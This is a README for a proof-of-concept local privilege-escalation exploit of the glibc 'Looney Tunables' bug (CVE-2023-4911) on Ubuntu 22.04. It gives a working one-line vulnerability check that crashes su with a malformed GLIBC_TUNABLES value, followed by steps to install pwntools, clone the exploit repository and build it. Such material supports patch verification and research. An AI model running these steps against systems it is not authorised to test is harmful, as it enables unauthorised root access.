This is a PoC of CVE-2023-4911 (a.k.a. "Looney Tunables") exploiting a bug in glibc dynamic loader's GLIBC_TUNABLES environment variable parsing function parse_tunables().
Code has been tested on Ubuntu 22.04.1 and 22.04.3 with glibc version 2.35-0ubuntu3.1, 2.35-0ubuntu3.3 .
No attempts have been made to generalize the PoC (read: "Works On My Machines"), so your mileage may vary.
As always, big kudos to the Qualys Threat Research Unit for the discovery of the vulnerability and for the very detailed writeup.
First you test if the system you want to exploit is vulnerable, for that you run:
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped)
The target is vulnerable
You'll need:
- Python 3
- Pip
- Pwn tools
- gcc
apt update
apt install -y python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools
git clone https://github.com/TiiZss/CVE-2023-4911
cd CVE-2023-4911
make
Exploit written by Xion of KAIST Hacking Lab
Modifications written by tisasia member of TiiZss hacking Lab